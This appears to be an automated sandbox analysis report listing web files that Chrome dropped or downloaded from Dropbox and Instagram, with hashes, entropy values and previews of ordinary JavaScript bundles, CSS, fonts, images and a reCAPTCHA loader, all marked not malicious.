                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="105c7d7c-5e42-3aa7-baf4-f9e5f8ec83a3")}catch(e){}}();.define(["exports","./e_file_viewer_static_scl_page_file","react","./c_core_i18n","./c_react-use_useEffectOnce","./c_dig-logos_src_glyph_fss"],(function(a,e,t,s,r,l){"use strict";function o(a){return a&&a.__esModule?a:{default:a}}var i=o(t);e.injectInternalStyle("/static/metaserver/static/js/signup_signin/unified_susi/register/password_validator.module.out-vfl1XdlK1.css",(a=>"._password-validator-container-redesign_4j67a_4{align-items:center;display:flex;flex-wrap:wrap;margin:0;padding-left:0}._password-validator-item-redesign_4j67a_13{margin-bottom:var(--spacing__unit--1_5);margin-right:var(--spacing__unit--1_5)}._password-validator-container_4j67a_4{display:flex;flex-direction:column;margin:0;padding-bottom:var(--dwg-spacing
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (65271)
                                                                        Category:dropped
                                                                        Size (bytes):351646
                                                                        Entropy (8bit):4.961264830701973
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:3BD0731C1DFA362630CBE8A08BB884CA
                                                                        SHA1:28D61EE44B711E86039692DFCAF0139BF72EDC08
                                                                        SHA-256:BF24B87E32CDBEAC39C814454056C83AE9A90B20516CDDC72F131CE11E5A5385
                                                                        SHA-512:D45786BEB779E15F0BEC2A1CC58810456040C75E5A8119253779931E1E795A7A9A61C039A29ED88513782E4F739F443CF3D6D362175781AED5E4ABD2A3F87440
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="637e70e1-aacc-388d-b3b9-d5f1d1e0d337")}catch(e){}}();.define(["exports","react","./e_file_viewer_static_scl_page_file","./c_dig-icons_assets_ui-icon_line_underline","./c_dig-icons_assets_ui-icon_line_twinkle-1","./c_dig-icons_assets_ui-icon_line_shuffle","./c_dig-icons_assets_ui-icon_line_lock","./c_dig-icons_assets_ui-icon_external-logo_twitter","./c_react-use_useEffectOnce","./c_dig-icons_assets_ui-icon_line_team","./c_dig-icons_assets_ui-icon_line_upload-file","./c_dig-icons_assets_ui-icon_line_sound-on","./c_dig-logos_src_glyph_fss","./c_dig-icons_assets_ui-icon_line_copy","./c_dig-icons_assets_ui-icon_line_undo","./c_dig-icons_assets_ui-icon_line_upload","./c_dig-icons_assets_ui-icon_line_ai","./c_dig-icons_assets_ui-icon_line_video-file","./c_dig-icons_assets_ui-icon_line_
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:HTML document, ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):5015
                                                                        Entropy (8bit):4.586463934320857
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:8F44F0214B42AFD1CDDB4B488576686B
                                                                        SHA1:44994345A3BCD78F744B2D563EFC2F3B437F550D
                                                                        SHA-256:D75791849FEC0B9273CE3A554E96527C318F10EEF5C0FBFF212E225E3AAB4CE8
                                                                        SHA-512:038AEEE14A5158858210B99A24EAEE865031A1AC5AB0DEDE31BF58B745D47B0354CCCE77114CF4E0B26FAF2EFA2D691440520ADDF203128329FE1A292B8E9062
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://usersurvey.dropbox.com/
                                                                        Preview:<html>. <head>. <script type="text/javascript">. // TODO (SURFDESK-768): Switch to using TS and our ts build pipeline. (function() {. var IS_PROD = 'PROD' === 'PROD';. var environmentId = IS_PROD ? 'eHSY0Wh44Y' : 'ROWpl81YT_';. var expectedOrigin = 'https://www.dropbox.com';.. // Snippet from Sprig (formerly UserLeap) to load their script. (function(l,e,a,p) {. window.Sprig = function(){U._queue.push(arguments)}. var U = window.Sprig;U.appId = a;U._queue = [];. a=l.createElement('script');. a.async=1;a.src=e+'?id='+U.appId;. // set up event listeners once Sprig has loaded. a.addEventListener("load", setUpEventListeners);.. p=l.getElementsByTagName('script')[0];. p.parentNode.insertBefore(a, p);. })(document, 'https://cdn.sprig.com/shim.js', environmentId);.. function updateExpectedOrigin(origin) {. // default to meta, but if we get a message f
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (2207)
                                                                        Category:dropped
                                                                        Size (bytes):2603
                                                                        Entropy (8bit):5.343710387462822
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:9E34AAF5DC137C2533E78DE49D165F15
                                                                        SHA1:D1002A8F53299A653D13CB2E10C46CB9457BE178
                                                                        SHA-256:28C42541419527356C535C0E51E1D161594055CE1473254989AB4985D88FCE81
                                                                        SHA-512:4B0D8448BA4CA206649C740DE794A56955AC5B019895A62BB69D2C9B5E38B10CF0D20673A29A87987EBAA340927E98A3EB901E540DF5509BF968D8E367EF5F2C
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="d9dd4459-f2e9-38f8-b18f-17784ffd0e7c")}catch(e){}}();.define(["exports","react"],(function(e,t){"use strict";function r(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(r){if("default"!==r){var n=Object.getOwnPropertyDescriptor(e,r);Object.defineProperty(t,r,n.get?n:{enumerable:!0,get:function(){return e[r]}})}})),t.default=e,Object.freeze(t)}var n=r(t);e.AddFolderLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M9 13.75v-1.5h2v-2h1.5v2h2v1.5h-2v2H11v-2H9Z",fill:"currentColor",vectorEffect:"non-suserng-stroke"}),n.createElement("path",{d:"M17.75 19h-12a2.25 2.25 0 0 1-2.25-2.25V5h4.573a2.238 2.238 0 0 1 2.012 1.244l.378.756H20v9.75A2.25 2.25 0 0 1 17.75 19ZM5 6.5v10.25a.75.75 0 0 0
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (565)
                                                                        Category:downloaded
                                                                        Size (bytes):616
                                                                        Entropy (8bit):5.147204843039308
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:6D92292A133E794F5C1FADC6361DD5AC
                                                                        SHA1:9F9C7C2DB732A64AB4A014E2AFDA0AA446D3A04B
                                                                        SHA-256:DC21D296459DD21437B246D4768E05C86DAE1180277C8A5AAC07E241665CF8B5
                                                                        SHA-512:A04A657802EAAD3B9047CC20BDF8245FFAC4B79014BE6A0588FA527B245F90ADEE8F4A2DE7F89436FFD9E15D6B37DADA12905D2BED120097226C5A2B78B6AA66
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/js/signup_signin/unified_susi/common/helpers.module.out-vflbZIpKh.css
                                                                        Preview:._hr-label_1rzgs_4{clear:both;margin:var(--dwg-spacing__unit--2,16px) 0;overflow:hidden;position:relative;text-align:center}._hr-label-text_1rzgs_12{color:var(--color__standard__text);font-family:var(--__dwgAtlasGroteskStack);font-size:16px;margin:0 var(--dwg-spacing__unit--2,16px)}._hr-label_1rzgs_4:after,._hr-label_1rzgs_4:before{background-color:hsla(36,10%,61%,.3);content:"";display:inline-block;height:1px;position:relative;vertical-align:middle;width:50%}._hr-label_1rzgs_4:before{margin-left:-50%;right:0}._hr-label_1rzgs_4:after{left:0;margin-right:-50%}./*# sourceMappingURL=helpers.module.out.css.map */
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (1969)
                                                                        Category:downloaded
                                                                        Size (bytes):2364
                                                                        Entropy (8bit):5.2963690071779
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:A65EAC8731C8520D4F7B445F71396070
                                                                        SHA1:4BAF8120D3E0D53E7635779DB8B76F420459D748
                                                                        SHA-256:3D876F3E0E6C99BDD02CDE04D824D5C5EAF81043F01BE37FC7935D165268DC62
                                                                        SHA-512:22E390F23C20DA9E5A634F7032C1B0E3F1516E96705D2F419BFB7718FD26356FC61C09CBC98AA72687C9EBC612314705CD6D986EDB1111075FFC6A41FC2CCA56
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_file_bundle_amd/dist/c_dig-icons_assets_ui-icon_line_passwords-vflpl6shz.js
                                                                        Preview:!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="c6750f37-dc32-33c3-af95-5ca85bf2623f")}catch(e){}}();.define(["exports","react"],(function(e,t){"use strict";function r(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(r){if("default"!==r){var n=Object.getOwnPropertyDescriptor(e,r);Object.defineProperty(t,r,n.get?n:{enumerable:!0,get:function(){return e[r]}})}})),t.default=e,Object.freeze(t)}var n=r(t);e.DropboxTransferLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M13.818 12 9.5 5h5.182L19 12l-4.318 7H9.5l4.318-7Z",fill:"currentColor",vectorEffect:"non-suserng-stroke"}),n.createElement("path",{d:"m11 10.694-.93 1.533.93 1.579L8.465 18 5 12.227 8.465 6.5 11 10.694Z",fill:"currentColor",vectorEffect:"non-suserng-stroke"})),e.Folde
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format (Version 2), CFF, length 77628, version 2.2490
                                                                        Category:downloaded
                                                                        Size (bytes):77628
                                                                        Entropy (8bit):7.997399359312532
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:748FD04DF3AEE82492EC3B5615213218
                                                                        SHA1:0AAC50D2E0FEE7EF3CD91C806A9A8A7F0E445B6D
                                                                        SHA-256:A7B709CDDAA8AE92BD3C9EC9D013295FFA3B408C5BA4EFA0395F78FFE1CC65F5
                                                                        SHA-512:33642738F6E3243360B9B970A5B4E36309EC13F5DC428ED83933C99940383614AF8525310AA9BE9C444E9605DD238A8CCA1B55E9118F214449320A2E866FA369
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://paper.dropboxstatic.com/static/fonts/SourceCodePro-Bold-2038.otf.woff2
                                                                        Preview:wOF2OTTO../<.......T.............................F......j..b..J.`..f.6.$..B....d. [f....c.]}.......fv.._................../..`..G.<..............|?..xH3....6.....9..n..l.D...D......B....3'~V.n.yS.w.b./......H.X0..:n9...j.-......m.v.....RU&..v4...!..V..X.M.^..}JhJ./....4.u-...^'..H...E...d....>..e.......[.....}p....d...78..>......$.G.-1D.'..b.`gw...{.:.......C!QH.!P-....CB.....w].gb63....X.V........$...a.G..."....O.....Z..)...3bf1b!ff4.....M.q%V.oY...\.4..z|.3B.....F..CI.%B.X..6.;..z.../...T.[.).T.JEZ.C..1...D.q.......>.N.x....L..7..q%NTX....H..e........UKR~.2.r+.;.D.3..3...%..lv;.....T.3v.%;..{.D'R..'..<..Mf6..RJ)..4....ffL.f."k..>.;....rM.!z...> .>[._`..h...N...kx.h..LsH.+:B\.....(...9J....,...*5...>..../.1o.b..`...".....e..n......M...i.+:..B+Ri......2.r<....g...DB.I..J.<.8..#..P].e.LN+..&c.._L..I.Y.....-...}e7.<.$...;....]....yM.&m....(.._~..-....QQT.<.{.s.|cL.2<wNw.|s:wu.-l...9......V...t...7.a...b.u."f..B.!..h{.'*...=..f..?C .f.5.p"A....K*b`*j..
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 561947
                                                                        Category:dropped
                                                                        Size (bytes):146544
                                                                        Entropy (8bit):7.997849059243924
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:813BF4B638E67EDE526A437585F96AA4
                                                                        SHA1:34665DC493EDC2609517C0E4C1F13178FE5048F0
                                                                        SHA-256:C5D4B4EABEA2C4EE952AE9BEC633E87160695D6F361855E1440E214ABB0ABF26
                                                                        SHA-512:5A2C312EC9F3B3EAD3767EEC672C095BD155EF33B0A40CD6D03F79EA30C7359EBCDFE452012E295AA0C7C3E6274BF31B6EE0DF299A1645A6279B1C7587523600
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:...........ks.6.0.].Bb..!.!F...p.u..v..O.Nf...IHbL..I.......m.\H..%.;...J.-.w.....s.......N..}8..........................f..gw.q.....?.i.`.#L.<..H..4(.G|.... 3^8.G..c...H.,.[.<<.?..l...:....<....Z.....Y.....NC.....zS......=....Tippp..T.u....q...o6w....po....o.6Uz=..l...A..c.7...y.....p#<.S|.....] .....I4O....A2.^..r..{..yAB2.....$.....1......^.A......uP...A...A.......g.....;.J......"?._......B......r....x.."&.7..!.acg..b.....-...o.V{D....7$i..6F..n..V+4........mg.e`........QD.O...VP..b.q..$..y...$.K.`.a....^N.<..2.....~.......KY.u3.r..3hU./........NC,5..".$.,.wRi..i.f.N.~>O..=..... ?&.wQN3$.(........7.|L|?..~.....e4.N.'.4.9:......2. yLO5q..O...A.y.+.....>...J_.|.. ........|tt...$#S|...iN......}....o.d{)[.....|./....xd.........~mK7.....?.p.#.-s.G..i.1.0...8{.[d.x.3..FO=e..k.#.#6Cg.&8....x..;+..$..g..=.qq.O1...-...LTx......%:...A.....3^......P...m.N.x.x%;uV..@.G2.q.5L$.'.tulg...{}e.}r....8..M.......C...S\...p...Y.A..S8........3^...>...U..`..:
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (1502), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1502
                                                                        Entropy (8bit):5.765620157436543
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:8493E024BE2493C14DB779EB9D642934
                                                                        SHA1:3EFDB4B756A9417B34A4B112338BB6B7D5BD56B5
                                                                        SHA-256:A677C5E5EE687589D4200BC10D3320D92C0BAC5C64D0467DC6F089CC5EDC329E
                                                                        SHA-512:8CEE489F7FFA68BF1413231B67CF92FF92DD4FDAB64218AED32FA9F17361B68C09554D135C13B1917FC1A61A3FAD94A42F21DB42CDE44435CB431D9333F8668F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('explicit');(cfg['onload']=cfg['onload']||[]).push('recaptchaOnloadCallback');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treat
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 465 x 635, 8-bit/color RGBA, non-interlaced
                                                                        Category:downloaded
                                                                        Size (bytes):99677
                                                                        Entropy (8bit):7.993551827213319
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:43FE412A5A8E044E23154DE68B79F21B
                                                                        SHA1:ED97E0340A962F09B7DE0C91EF9601BADCD4582B
                                                                        SHA-256:75DE72E5509F4C6EAECC24F8B5A0236B302D0C466470222C3FE4F2B1D775944F
                                                                        SHA-512:FF1D290595DE8F5468381D8545ED1C224C3776C3EF28AFB31999BF52FEEFCC4FE51FC73145F54A2CA2222C2B58DC46987B14CDD964F03DBC3A2DB9953CCC35AC
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://static.cdninstagram.com/images/instagram/xig/homepage/phones/home-phones.png?__makehaste_cache_breaker=HOgRclNOosk
                                                                        Preview:.PNG........IHDR.......{............$IDATx..yl.U...oK7....Zv.......&....cqI.L..8.M4....Fs..g.+`pc.0x...k...a..N.)..hK;..I...I...K.......9}..<.9....yb.....#77..xxx..._.\.e.J..H3x..O....666.....'"%.X...G;B.[.......jkk..[..L<<<..>qv..m..K333!NO...)....4....ek.Y$...DS.S.N-Q..T...<.!N......%......AQ.V....S.N...#A..j_,.p..<5.....O...yv..}.v.R5...+.9!N...:..W!U.........$.om=./N....w.Zq.I...{...7..K{.?.....T.ud...ge....L=<.v....?iG.k>.K..IUU..i....+W.o..J......R..6j...@:w....|.J.....y...I..M....(.N7...<.~1.:.<..<..'L...#W..sdZTT$.z.r.VA.=.}.^.B.Z..'....w.1K...h...s..>.<.........G.....J...N..{@....].L<<<....M.6G..0.:......S.@..g8x!...)C.$..~..T.'...\.N....G..5..D?"Y..B,e.@.K.(a..4l!b.Z....o.b.^..w=<....s.v..1.={.....2...hDHT.J...\(...S_.cj..v.z#L.]....L=<.$S..0.j..e.w......./.t..I9q.TWWC.....n..9..8p.....yw...zx.m;.E...Ig.L)C.F...O...;.a..3j.V......o.$.G.'.....ko..f'..._v....B.......FJ=O...D....'.n.....j.[.]:`nn...9..?g.=|. $.3EaB..-)4......
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 54666, version 1.0
                                                                        Category:downloaded
                                                                        Size (bytes):54666
                                                                        Entropy (8bit):7.996310405191114
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:EBEE194A9B773F166DC16096F8614AAA
                                                                        SHA1:9D6A893AF295C90E9E9792D7E54A80034192255B
                                                                        SHA-256:00F90DB31F42975FCDC5FA1F70660568BE68792EC11BE2AAC36362F435A6E555
                                                                        SHA-512:B1E67F381C8266FF60E09CCCBA6CB17FE0DF4CC8D373E15F20F14B6E8C2F6BAB4C0E91163E57C3C2F4593AC23512A43B2129CABA1945870BE4493D1DEF2DDCD5
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/fonts/sharpgrotesk/SharpGroteskDBBook20-vfl6-4ZSp.woff2
                                                                        Preview:wOF2.............KX...c.........................@...2..D.`..@................6.$..f..v.. ..R.....V[.....rW..y.@...=/.%}....W..=7.eA.Z[..m*1....h........'Y.......r.....>...i.~h.\.j...4..M.......Ch.0.@d"........J.......L.4..hdD..`F.=..S.... #.n....9.G...2.t...m..-.M..>,qv.rI.LN............1....{.o......xxD..G.jt.......Y....g'..G......g7.O...c.@6..uuS.C:....:.Z.!......0.u}...;J..%.q$.......... ...........KE...Gt..xw.....x....{...B.9.gvV...;...'s.%.nd:..k...1..z.T.........^..o..{...K@..^@.hc..._..&....g.%.@...E....f...]..[UIuR...:.....f.<g.....$..pj.(]...zF.......cc.o....-..1F.......u.^..yzi....U2.f%...w......:.R.{.lOP[L..r..B`2...s.u.?...)l.P#...!.#>.....Na..Tx./.]..K.....E)..0g..MO..?U.4.1...]..M\..6...............n..'....3rD9....{.{.....d..R5F.@a.6.6b7V"...$...h..J.Y.....'.=.....ga.X.............u.>..Y6P.6..bGB%:%x..e.IB.q............!F%b.......{.w] .6.w....9.~,......u#(.QS...$..n?.......{.$D_...Ht.Q.2.i%.._S`j+.~..~.e...$......L..q`.^.-+.'.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):255
                                                                        Entropy (8bit):5.181110946732397
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:5CDC20BEC764EEDD4CB5275BF0AAF4D0
                                                                        SHA1:A6DF9646C37996C4F8A118621B404925EEA353EE
                                                                        SHA-256:05E1FBE4401829DB2CA3ECB53F1F748CA2F47E7907A8D2E90D1641E0FC6CFB7C
                                                                        SHA-512:4E7F02CECBA9C7197ABDB0C1338FDC6A06B78FA424658DB3C2D080051E540D37350417A10BCB5107CEAD781D526E58CC56044DAD8CFABC6992A6ED6848EF302F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cfl.dropboxstatic.com/static/metaserver/static/js/signup_signin/unified_susi/unified_susi.module.out-vflXNwgvs.css
                                                                        Preview:._unified-susi_s59m6_4{display:inline-block;margin-bottom:0;margin-top:0;max-width:350px;vertical-align:middle;width:350px}@media only screen and (max-width:414px){._unified-susi_s59m6_4{width:100%}}./*# sourceMappingURL=unified_susi.module.out.css.map */
                                                                        No static file info